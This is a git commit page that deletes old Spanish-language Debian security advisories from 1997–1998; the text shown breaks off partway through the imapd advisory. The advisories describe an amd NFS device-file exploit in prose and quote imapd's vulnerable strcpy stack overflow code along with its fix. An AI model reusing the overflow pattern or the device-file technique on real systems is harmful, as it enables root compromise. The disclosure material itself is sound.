aboutsummaryrefslogtreecommitdiffstats
path: root/spanish/security
diff options
context:
space:
mode:
authorLaura Arjona Reina <larjona@debian.org>2023-10-05 20:41:58 +0200
committerLaura Arjona Reina <larjona@debian.org>2023-10-05 20:42:51 +0200
commit990fdc128cc47e6bcd66132313442b1d95a54ae9 (patch)
treeca274057dd0acfb7280b27a875751da8f37fcd34 /spanish/security
parentbccb056047f1babdcc6cb39502b45cc2c6d0ba0b (diff)
[Spanish] remove very old files that were removed from /english folder many years ago
Diffstat (limited to 'spanish/security')
-rw-r--r--spanish/security/amd.htm37
-rw-r--r--spanish/security/bind.htm75
-rw-r--r--spanish/security/deliver.htm40
-rw-r--r--spanish/security/dwww.html36
-rw-r--r--spanish/security/info/amd-nodev.html52
-rw-r--r--spanish/security/info/amd-nodev.patch11
-rw-r--r--spanish/security/info/doom.html29
-rw-r--r--spanish/security/info/elm-me+.html47
-rw-r--r--spanish/security/info/imapd.html185
-rw-r--r--spanish/security/info/inetd-groups.html50
-rw-r--r--spanish/security/info/metamail.html76
-rw-r--r--spanish/security/info/metamail.patch66
-rw-r--r--spanish/security/info/minicom.html75
-rw-r--r--spanish/security/info/nlspath.c39
-rw-r--r--spanish/security/info/nlspath.html67
-rw-r--r--spanish/security/info/nslpath.html51
-rw-r--r--spanish/security/info/php.html81
-rw-r--r--spanish/security/info/probe.c39
-rw-r--r--spanish/security/info/rlogin.html208
-rw-r--r--spanish/security/info/screen.html68
-rw-r--r--spanish/security/info/sendmail-dead-letter.html79
-rw-r--r--spanish/security/info/shellcode.s37
-rw-r--r--spanish/security/info/sperl-5.003.html45
-rw-r--r--spanish/security/info/sperlexp.tgzbin3245 -> 0 bytes
-rw-r--r--spanish/security/info/stack.c97
-rw-r--r--spanish/security/info/superprobe.html87
-rw-r--r--spanish/security/info/talkd.html207
-rw-r--r--spanish/security/info/tftpd.html111
-rw-r--r--spanish/security/info/tftpd.patch25
-rw-r--r--spanish/security/info/xfree3.html29
-rw-r--r--spanish/security/template.html81
31 files changed, 0 insertions, 2130 deletions
diff --git a/spanish/security/amd.htm b/spanish/security/amd.htm
deleted file mode 100644
index 11c269d0651..00000000000
--- a/spanish/security/amd.htm
+++ /dev/null
@@ -1,37 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-<H1><IMG SRC="../PICS/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux -">Informaci&oacute;n sobre Seguridad</H1>
-<HR>
-
-<P>Por favor, envie las noticias de fallos relacionados con la seguridad a <A HREF="mailto:security@debian.org">security@debian.org</A><P>
-
-<DL>
-<DT>Fecha notificaci&oacute;n:
- <DD>7 de Abril, 1997</DD>
-<DT>Paquetes afectados:
- <DD>amd</DD>
-<DT>Breve descripci&oacute;n:
- <DD>amd ignora la opci&oacute;n nodev</DD>
-<DT>Vulnerable:
- <DD><FONT COLOR="#FF0000">S&iacute;</FONT>
-<DT>Corregido en:
- <DD>amd upl102-11
-<DT>Entrada en distribuci&oacute;n:
- <DD>Debian 1.2.10, versi&oacute;n del 16 de Abril, contiene este paquete
-<DT>Para m&aacute;s informaci&oacute;n:
- <DD><A HREF="info/amd-nodev.html">Seguridad-Linux</A>
-</DL>
-
-<P><SMALL>&Uacute;ltima modificaci&oacute;n: 10 Enero 1998. Copyright
-&copy;1997 SPI; Ver <A HREF="license.html">condiciones de licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
diff --git a/spanish/security/bind.htm b/spanish/security/bind.htm
deleted file mode 100644
index 694c8912c8c..00000000000
--- a/spanish/security/bind.htm
+++ /dev/null
@@ -1,75 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-<TITLE>Debian GNU/Linux - Informacion sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux -"> Informaci&oacute;n sobre Seguridad</H1>
-<HR>
-
-<P>Por favor, envie las noticias de fallos relacionados con la seguridad a <A HREF="mailto:security@debian.org">security@debian.org</A><P>
-
-<DL>
-<DT>Fecha notificaci&oacute;n: no-publica - 1 de Abril de 1998; publica - 8 de Abril de 1998
-<P>
-<DT>Paquetes afectados: bind 4.9 previos a 4.9.7-1 y bind 8 previos a 8.1.2-1
-<P>
-<DT>Breve descripci&oacute;n:
- <DD>Versiones m&aacute;s antiguas del bind son vulnerables a un desbordamiento de 'buffer' durante una solicitud de pregunta inversa (inverse query request), permitiendo potencialmente el acceso al sistema como root. Vulnerabilidades adicionales permiten el rechazo a los 'ataques al servicio' en el servicio bind.
-<P>
-<DT>Vulnerable: <FONT COLOR="#FF0000">S&iacute;</FONT>
-<P>
-<DT>Corregido en:
- <DD>bind 4.9.7-2 en Debian GNU/Linux 1.3.1 alias bo
-<HR>
- <DD>Archivos fuente:
- <DD>http://ftp.debian.org/debian/bo-updates/bind_4.9.7-2.dsc
- <DD><SMALL>(MD5 checksum: e8414fc30c7f9439051a8afffd7c43f)</SMALL>
- <DD>http://ftp.debian.org/debian/bo-updates/bind_4.9.7-2.diff.gz
- <DD><SMALL>(MD5 checksum: e2553787cab0b08da2947ed8d42201d3)</SMALL>
- <DD>http://ftp.debian.org/debian/bo-updates/bind_4.9.7.orig.tar.gz
- <DD><SMALL>(MD5 checksum: a8a5e3ddef2be0c27c65b92f6cd9a53e)</SMALL><P>
-
- <DD>Arquitectura Intel:</DD>
- <DD>http://ftp.debian.org/debian/bo-updates/bind_4.9.7-2_i386.deb
- <DD><SMALL>(MD5 checksum: 08084183427d9259f34fd0460a610f01)</SMALL>
-P>
-<DD>Estos ficheros ser&aacute;n trasladados a http://ftp.debian.org/debian/bo/source/ y ftp://ftp.debian.org/debian/bo/binary-i386/ posteriormente.
-<P>
-<DT>Corregido en:
- <DD>bind 1:8.1.2-1 en Debian GNU/Linux pre2.0 alias hamm
-<HR>
- <DD>Archivos fuente:
- <DD>http://ftp.debian.org/debian/hamm/hamm/source/net/bind_8.1.2-1.diff.gz
- <DD><SMALL>(MD5 checksum: 5f50024f6661dc7ed5dadf83d964b58e)</SMALL>
- <DD>http://ftp.debian.org/debian/hamm/hamm/source/net/bind_8.1.2-1.dsc
- <DD><SMALL>(MD5 checksum: 67efab5f2e4f7ae57db945d926bdbb5d)</SMALL>
- <DD>http://ftp.debian.org/debian/hamm/hamm/source/net/bind_8.1.2.orig.tar.gz
- <DD><SMALL>(MD5 checksum: 42e47e9a1002754ac19fc15a0c6bb061)</SMALL>
-<P> Arquitectura Intel:
- <DD>http://ftp.debian.org/debian/hamm/hamm/binary-i386/net/bind_8.1.2-1.deb
- <DD><SMALL>MD5 checksum: 6e1116555fb6c421eb75c27717998708</SMALL>
-<P> Arquitectura Motorola 68k:
- <DD>http://ftp.debian.org/debian/hamm/hamm/binary-m68k/net/bind_8.1.2-1.deb
- <DD><SMALL>MD5 checksum: 692593d6bfb4a3c73627d49eac1e478b</SMALL>
-<P> Arquitectura Sparc
- <DD>http://ftp.debian.org/debian/hamm/hamm/binary-sparc/net/bind_8.1.1-7.deb
- <DD><SMALL>MD5 checksum: d5d665d8b6bf1009eb1b23ef3c1bf736</SMALL>
-<P> Arquitectura Alpha
- <DD>http://ftp.debian.org/debian/hamm/hamm/binary-alpha/net/bind_8.1.2-1.deb
- <DD><SMALL>MD5 checksum: 05dade39b728576e805096ae440d3938</SMALL>
-<P> Arquitectura PowerPC
- <DD>http://ftp.debian.org/debian/hamm/hamm/binary-powerpc/net/bind_8.1.2-1.deb
- <DD><SMALL>MD5 checksum: c8ea22885efe55381b70002a4678c607</SMALL>
-<P>
-<DT>Entrada en distribuci&oacute;n: 19 de Abril, 1998
-<DT>Para m&aacute;s informaci&oacute;n: CERT advisory CA-98.05
-</DL><P><SMALL>e;ltima Modificaci&oacute;n: 11 de Mayo, 1998. Copyright
-&copy;1997 SPI; Ver <A HREF="license.html">condiciones de licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
diff --git a/spanish/security/deliver.htm b/spanish/security/deliver.htm
deleted file mode 100644
index 77aaa583e2f..00000000000
--- a/spanish/security/deliver.htm
+++ /dev/null
@@ -1,40 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Informaci&oacute;n sobre Seguridad</H1>
-<HR>
-
-<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P>
-
-<DL>
-<DT>Fecha notificaci&oacute;n:
- <DD>10 de Enero, 1998
-<DT>Paquetes afectados:
- <DD>deliver
-<DT>Breve descripci&oacute;n:
- <DD>El desbordamiento de buffer puede permitir el acceso como root. deliver no se utiliza en Debian por defecto por lo que la mayor&iacute;a de los usuarios no se ver&aacute;n afectados.
-<DT>Vulnerable:
- <DD><FONT COLOR="#FF0000">S&iacute;</FONT>
-<DT>Corregido en:
- <DD>deliver 2.1.13, disponible en bo-updates
-<DT>Entrada en distribuci&oacute;n:
- <DD>11 de Enero 1998
-<!--
-<DT>Para m&aacute;s informaci&oacute;n:
- <DD>
--->
-</DL>
-
-<P><SMALL>&Uacute;ltima modificaci&oacute;n: 15 Enero 1998.
-Copyright &copy;1997 SPI; Ver
-<A HREF="../license.html">condiciones de licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
diff --git a/spanish/security/dwww.html b/spanish/security/dwww.html
deleted file mode 100644
index 23316711d35..00000000000
--- a/spanish/security/dwww.html
+++ /dev/null
@@ -1,36 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-<TITLE>Debian GNU/Linux - Informaci&oacute;n sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Informaci&oacute;n sobre Seguridad</H1>
-<HR>
-
-<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P>
-
-<DL>
-<DT>Fecha notificaci&oacute;n:
- <DD>11 de Febrero de 1998
-<DT>Paquetes afectados:
- <DD>dwww
-<DT>Breve descripci&oacute;n:
- <DD>Meta-caract&eacute;res de shell permitidos
-<DT>Vulnerable:
- <DD><FONT COLOR="#FF0000">S&uacute;</FONT>
-<DT>Corregido en:
- <DD>dwww 1.4.3-1 en hamm, 1.4.2-1 en bo-updates
-<DT>Entrada en distribution:
- <DD>
-</DL>
-
-<P><SMALL>&Uacute;ltima modificaci&oacute;n: 29 de Abril, 1998
-Copyright &copy;1998 SPI; Ver
-<A HREF="../license.html">condiciones de licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
diff --git a/spanish/security/info/amd-nodev.html b/spanish/security/info/amd-nodev.html
deleted file mode 100644
index 4afbabac300..00000000000
--- a/spanish/security/info/amd-nodev.html
+++ /dev/null
@@ -1,52 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-<TITLE>Debian GNU/Linux - Informaci&oacute;n sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Informaci&oacute;n sobre Seguridad</H1>
-<HR>
-Debian se toma la seguridad muy en serio. La mayor&iacute;a de los <a href="../index.html">problemas sobre seguridad</a> llegados
-a nuestra atenci&oacute;n son corregidos en 48 horas.
-
-<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P>
-
-<blockquote>
-<b>Fecha: Lunes, 7 Abr 1997 22:59:27 -0400 (EDT)</b> <br>
-<b>De: Bradley M Keryan &lt;keryan@andrew.cmu.edu&gt;</b> <p>
-
-El amd del fichero amd-920824upl102-6.i386.rpm distribuido con Red Hat
-Linux 4.1 no acepta la opci&oacute;n nodev para los sistemas de ficheros NFS y posiblemente otros tipos soportados, permitiendo a cualquier usuario el acceso a los dispositivos en /dev de un sistema, con tal que tengan acceso como root en otra linux box de la red. Adem&aacute;s, el amd.conf por defecto de RH 4.1 mapea /net/* al montar NFS, lo que hace que del fallo de de amd un agujero de f&aacute;cil accesibilidad. <p>
-
-<b>La "Exploit":</b> <p>
-
-Un amigo mio que ten&iacute;a una cuenta en mi m&aacute;quina encontr&oacute; un grave agujero de seguridad en amd cuando decidi&oacute; gastarme una broma usando /dev/dsp a horas impares, pero descubri&oacute; que yo hab&iacute;a denegado el acceso a /dev/dsp y /dev/audio. Supuso que yo habr&iacute;a olvidado poner las opciones nosuid y nodev en el mapeo de amd para NFS (el mapeo for defecto de Red Hat 4.1, que *tiene* opts=nosuid,nodev), as&iacute; que cre&oacute; un dispositivo de caracteres en su m&aacute;quina con el n&uacute;mero mayor 14 y menor 3, permisos 666, export&oacute; el directorio en el que encontraba via NFS, y entr&oacute; en mi m&aacute;quina. Utiliz&oacute; el mapeo /net/* de amd para montar el directorio, y luego utiliz&oacute; el dispositivo de caracteres en sistema de ficheros NFS montado para tocar los sonidos, a pesar de que /proc/mounts y /etc/mtab mostraban como montado nodev. <p>
-
-Esta exploit funciona para dispositivos de bloque y de caract&eacute;res. Puede ser utilizado para realizar actos m&aacute;s maliciosos que simplemente para tocar sonidos, como explorar /dev/mem para buscar passwords, cambiar permisos de los ficheros o el contenido de /etc/shadow con un editor de discos raw, y diversas y varias otras malas cosas. <p>
-
-Este fallo puede afectar a cualquier otra distribuci&oacute;n que incluya amd, pero tanto el exploit como el fallo solo han sido probados en Red Hat 4.1. <p>
-
-<b>Soluci&oacute;n:</b>
-
-Un <a href="amd-nodev.patch">one-character typo</a> en el fichero de cabecera de amd espec&iacute;fico para linux evita en realidad que pase la opci&oacute;n nodev al kernel. <p>
-
-Eso es. Evidentemente M_NODEV fue definido para algo m&aacute;s en otra parte,
-sin o amd no deber&iacute;a ser compilado. <p>
-
-Brad Keryan <br>
-<a href="mailto:keryan@andrew.cmu.edu">keryan@andrew.cmu.edu</a> <br>
-<a href="http://fatale.res.cmu.edu/">http://fatale.res.cmu.edu/</a>
-</blockquote>
-
-<P><SMALL>&Uacute;ltima modificac&iacute;n: 10 Enero 1998.
-Copyright &copy;1997 SPI; Ver
-<A HREF="../../license.html">condiciones de licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
-
-
diff --git a/spanish/security/info/amd-nodev.patch b/spanish/security/info/amd-nodev.patch
deleted file mode 100644
index 27247e4ffcd..00000000000
--- a/spanish/security/info/amd-nodev.patch
+++ /dev/null
@@ -1,11 +0,0 @@
---- amd-upl102/config/os-linux.h.bad Mon Apr 7 16:41:51 1997
-+++ amd-upl102/config/os-linux.h Mon Apr 7 16:42:19 1997
-@@ -252,7 +252,7 @@
-
- #define M_RDONLY 1 /* mount read-only */
- #define M_NOSUID 2 /* ignore suid and sgid bits */
--#define M_NONDEV 4 /* disallow access to device special files */
-+#define M_NODEV 4 /* disallow access to device special files */
- #define M_NOEXEC 8 /* disallow program execution */
- #define M_SYNC 16 /* writes are synced at once */
- #define M_REMOUNT 32 /* alter flags of a mounted FS */
diff --git a/spanish/security/info/doom.html b/spanish/security/info/doom.html
deleted file mode 100644
index 4a5d178de12..00000000000
--- a/spanish/security/info/doom.html
+++ /dev/null
@@ -1,29 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-<TITLE>Debian GNU/Linux - Informaci&oacute;n sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Informaci&oacute;n sobre Seguridad</H1>
-<HR>
-Debian se toma la seguridad muy en serio. La mayor&iacute;a de los <a href="../index.html">problemas sobre seguridad</a> llegados a nuestra atenci&oacute;n son corregidos en 48 horas.
-
-<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P>
-
-<blockquote>
-<b>De: <a href="mailto:alan@cymru.net">Alan Cox</a></b> <p>
-Secundariamente cualquiera que utilice el script startmouse/startmouse.sh de Doom... que crea un /tmp/gpmscript deber&iacute;a observar que un usuario puede sustituir el script y conseguir al acceso como root.
-</blockquote>
-
-<P><SMALL>&Uacute;ltima modificaci&oacute;n: 10 Enero 1998.
-Copyright &copy;1997 SPI; Ver
-<A HREF="../../license.html">condiciones de licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
-
-
diff --git a/spanish/security/info/elm-me+.html b/spanish/security/info/elm-me+.html
deleted file mode 100644
index 18d5f5bf120..00000000000
--- a/spanish/security/info/elm-me+.html
+++ /dev/null
@@ -1,47 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-<TITLE>Debian GNU/Linux - Informaci&oacute;n sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Informaci&oacute;n sobre Seguridad</H1>
-<HR>
-Debian se toma la seguridad muy en serio. La mayor&iacute;a de los <a href="../index.html">problemas sobre seguridad</a> llegados
-a nuestra atenci&oacute;n son corregidos en 48 horas.
-
-<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P>
-
-<blockquote>
-<b>De: John Goerzen &lt;jgoerzen@happy.cs.twsu.edu&gt;</b>, Maintainer of elm <br>
-<b>Fecha: Jueves, 15 May 1997 11:44:08 -0500</b><p>
-
-Recientemente ha sido anunciado un agujero de seguridad de Elm en bugtraq y
-en consecuencia en la seguridad-linux que podr&iacute;an llevar a no autorizados, como m&iacute;nimo, al mail spool de todos los usuarios del sistema.<p>
-
-El Elm por defecto de Debian para el stable (1.2.x) es Elm. Esta version de Elm es
-vulnerable.<p>
-
-El mailer por defecto para frozen (la versi&oacute;n 1.3 venidera) y unstable
-(continuando en desarrolo), Elm-ME+ (una versi&oacute;n mejorada de Elm), es tambi&eacute;n
-vulnerable.<p>
-
-He parcheado Elm-ME+ para corregir este problema. He descargado los paquetes
-en stable, frozen, y unstable. Adem&aacute;s, el Elm-ME+ m&aacute;s reciente est&aacute; siempre disponible v&iacute;a FTP an&oacute;nimo desde <a href="ftp://happy.cs.twsu.edu/pub/Debian/binaries/">ftp://happy.cs.twsu.edu/pub/Debian/binaries/</a>. <p>
-
-Esta versi&oacute;n corregida de Elm-ME+, elm-me+_2.4pl25ME+31-5_i386.deb, est&aacute; disponible para bajarlo de inmediato en <a href="ftp://happy.cs.twsu.edu/pub/Debian/binaries/elm-me+_2.4pl25ME+31-5_i386.deb">ftp://happy.cs.twsu.edu/pub/Debian/binaries/elm-me+_2.4pl25ME+31-5_i386.deb</a>. <p>
-
-Aconsejar&iacute;a a la gente que se actualizara al Elm-ME+ m&aacute;s reciente. Aquellas personas que usan Elm y no Elm-ME+ -- Elm-ME+ corrige tambi&eacute;n otros fallos , as&iacute; que la actualizaci&oacute;n no ser&iacute;a perjudicial. <p>
-</blockquote>
-
-<P><SMALL>&Uacute;ltima modificac&iacute;n: 10 Enero 1998.
-Copyright &copy;1997 SPI; Ver
-<A HREF="../../license.html">condiciones de licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
-
-
diff --git a/spanish/security/info/imapd.html b/spanish/security/info/imapd.html
deleted file mode 100644
index 6d3e77e032c..00000000000
--- a/spanish/security/info/imapd.html
+++ /dev/null
@@ -1,185 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-<TITLE>Debian GNU/Linux - Informaci&oacute;n sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Informaci&oacute;n sobre Seguridad</H1>
-<HR>
-Debian se toma la seguridad muy en serio. La mayor&iacute;a de los <a href="../index.html">problemas sobre seguridad</a> llegandos a nuestra atenci&oacute;n son corregidos en 48 horas.
-
-<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P>
-
-<blockquote>
-<b>Fecha: Dom, 2 Mar 1997 21:42:14 -0700</b> <br>
-<b>De: David Sacerdote &lt;davids@SECNET.COM&gt;</b> <p>
-
-<pre>
- ###### ## ## ######
- ## ### ## ##
- ###### ## # ## ##
- ## ## ### ##
- ###### . ## ## . ######.
-
- Secure Networks Inc.
-
- Aviso sobre Seguridad
- 2 de Marzo de 1997
-
-
- Desbordamiento de buffer en imapd r ipop3d
-</pre>
-
-Existe una vulnerabilidad en el mail server toolkit de Mark Crispin que pod&iacute;a permitir a cualquier individuo obtener acceso como root en servidores donde corren imapd y ipop3d. Esta vulnerabilidad se encuentra en los servidores POP3 y IMAP2bis incluidos en la distribuci&oacute;n de PINE, as&iacute; como en los servidores IMAP2bis y IMAP4 incluidos en el IMAP toolkit de Mr. Crispin. <p>
-
-
-<b>Detalles t&eacute;cnicos</b> <p>
-
-Los vulnerables servidores de correo llaman a una rutina de librer&iacute;a para afectar un "login" de Unix, autentificando al usuario con su password. Existe un desbordamiento de pila
-en esta rutina. Esencialmente esto puede permitir a cualquier cliente con la habilidad de intentar un login introducir un nombre de usuario excesivamente largo para hacer que se ejecute cualquier c&oacute;digo de la m&aacute;quina. <p>
-
-Tanto el servidor POP como el IMAP que Mr. Crispin distribuye descartan los privilegios de supervisor alguna vez despu&eacute;s de la fase de autentificaci&oacute;n. Desafortunadamente, el desbordamiento ocurre antes de que esto suceda, y la vulnerabilidad de este modo puede permitir acceso como superusuario al atacante. <p>
-
-La problem&aacute;tica rutina es server_login(), que se encuentra en "log_xxx.c" en el arbol del c&oacute;digo dependiente del SO de la distribuci&oacute;n de fuentes del servidos. El problema se da debido al intento de la rutina de permitir un comparaci&oacute;n insensitiva al caso en el nombre de usuario, que realiza copiando el nombre de usuario facilitado a la rutina en una variable autom&aacute;tica en la pila de la rutina. <p>
-
-El buffer del nombre de usuario es de longitud MAILTMPLEN, por defecto de 1024 bytes.
-Desafortunadamente, el buffer de entrada del servidor es mayor que &eacute;ste, permitiendo a un cliente remoto proporcionar a la rutina un nombre de usuario mayor a los 1024 bytes. Si los caracteres de exceso en el nombre de usuario contienen una direcci&oacute;n valida de memoria virtual, la rutina sobreescribir&aacute; su estructura de pila al copiar el nombre de usuario, causando el regreso desde la rutina para saltar a una posici&oacute;n inesperada. <p>
-
-Interesadamente, el buffer se convierte a min&uacute;sculas despu&eacute;s de ser copiado. Proporciona un peque&ntilde;o reto t&eacute;cnico;, ya que el c&oacute;digo de la m&aacute;quina requerido para controlar el servidor contiene caracteres en may&uacute;sculas. A pesar de todo, las modificaciones al c&oacute;digo "estandar" de la vulnerabilidad de desbordemiento de pila para invertir los efectos de este lowercasing son triviales. En los i386 4.4BSD, la direcci&oacute;n de MV
-necesaria para redireccionar el resultado de server_login() no necesita tener caract&eacute;res en may&uacute;sculas. <p>
-
-El c&oacute;digo defectuoso lee: <p>
-
-<pre>
-long server_login (char *user, char *pass, int argc, char *argv[])
-{
- char tmp[MAILTMPLEN];
- struct passwd *pw = getpwnam (user);
- /* permite la comparaci&oacute;n independiente del caso*/
- if(!pw) pw = getpwnam (lcase (strcpy (tmp, user)));
-
- <completar el login del servidor y volver>
-}
-</pre>
-
-
-<b>Impacto</b> <p>
-
-
-Individuos remotos, que no tiene un nombre de usuario y password v&aacute;lido para
-el servidor de correo, pueden obtener el acceso como root en sistemas donde corre un servidor IMAP o POP vulnerable. <p>
-
-
-<b>Sistemas vulnerables</b> <p>
-
-Cualquier sistema donde se ejecute el servidos POP o IMAP de Mark Crispin, de una versi&oacute;n
-anterior al 4.1beta es vulnerable. Para determinar si su sistema es vulnerable, realice un telnet a los puertos 109, 110, 143 y 220. Si ve un encabezamiento como: <p>
-
-<pre>
-* OK example.com IMAP2bis Service 7.8(92) at Mon, 3 Mar 1997 12:00:00
--0500 (EST)
-
-o:
-
-* OK example.com IMAP4 v10.00 server ready
-
-o:
-
-+OK example.com POP3 3.0(10) w/IMAP client (Report problems in this server
-to MRC@CAC.Washington.edu) at Mon, 3 Mar 1998 12:00:00 -0500 (EST)
-</pre>
-
-
-Entonces su sistema es vulnerable. Si ve "POP3 3.3" o "IMAP4rev1"
-o posterior, su servidor POP o IMAP no es vulnerable. <p>
-
-Los servidores POP que no derivan del c&oacute;digo de Mark Crispin, incluyendo los a veces confusamente llamados "pop3d" de la University of California en Davis no son vulnerables al ataque descrito en este aviso. Del mismo modo, el poper, y los servidores POP derivados, incluyendo el Qualcomm popper, de la University of California en Berkeley, no son vulnerables a este ataque. <p>
-
-<b>Informaci&oacute;n sobre la soluci&oacute;n</b> <p>
-
-Como un trabajo temporal, puede inhabilitar los servicios POP y IMAP en /etc/inetd.conf, y luego matar y reiniciar inetd. <p>
-
-Puede corregir el problema en el fuente por sí mismo, cambiando la funci&oacute;n
-server_login() para leer: <p>
-
-<pre>
- char tmp[MAILTMPLEN];
- struct passwd *pw = getpwnam (user);
-
- if(!pw) {
- strncpy(tmp, user, MAILTMPLEN - 1);
- pw = getpwnam(lcase(tmp));
-</pre>
-
-O, como &uacute;ltima opci&oacute;n, puede cambiar a la distribuci&oacute;n IMAP 4.1 beta,
-que puede encontrarse en <a href="ftp://ftp.cac.washington.edu/mail/imap.tar.Z">ftp://ftp.cac.washington.edu/mail/imap.tar.Z</a>. <p>
-
-<b>Informaci&oacute;n adicional</b> <p>
-
-Si tiene alguna pregunta sobre este aviso, puede contactar conmingo,
-enviando un mensaje a davids@secnet.com Si desea cifrar su mensaje
-, puede usar la siguiente clave p&uacute;blica de PGP. <p>
-
-<pre>
------BEGIN PGP PUBLIC KEY BLOCK-----
-Version: 2.6.2
-
-mQCNAzJ4qJAAAAEEAOgB7mooQ6NgzcUSIehKUufGsyojutC7phVXZ+p8FnHLLZNB
-BLQEtj5kmfww2A2pR29q4rgPeqEUOjWPlLNdSLby3NI8yKz1AQSQLHAwIDXt/lku
-8QXClaV6pNIaQSN8cnyyvjH6TYF778yZhYz0mwLqW6dU5whHtP93ojDw1UhtAAUR
-tCtEYXZpZCBTYWNlcmRvdGUgPGRhdmlkc0BzaWxlbmNlLnNlY25ldC5jb20+
-=LtL9
------END PGP PUBLIC KEY BLOCK-----
-</pre>
-
-M&aacute;s informaci&oacute;n acerca del Interactive Mail Access Protocol puede obtenerse en los RFCs 1731, 1732, 1733, 2060, 2061, 2062, 2086, 2087, 2088, y
-2095. M&aacute;s informaci&oacute;n acerca del Post Office Protocol puede obtenerse en los RFCs 1939 y 1957. Copias de los RFCs se pueden encontrar en <a href="http://ds.internic.net/rfc/rfcXXXX.txt">http://ds.internic.net/rfc/rfcXXXX.txt</a>. <p>
-
-Para m&aacute;s informaci&oacute;n sobre Secure Networks Inc, incluyendo informaci&oacute;n sobre los productos, avisos anteriores, y documentos, ver <a href="http://www.secnet.com/">http://www.secnet.com/</a>.
-
-Si desea obtener consejos de Secure Networks por medio de nuestra lista de correo, por favor envie un mail a sni-advisories-request@secnet.com, con una sola linea que diga:
-subscribe sni-advisories <p>
-
-
-<b>Copyright</b> <p>
-
-
-Los contenidos de este aviso son Copyright (C) 1997 Secure Networks Inc,
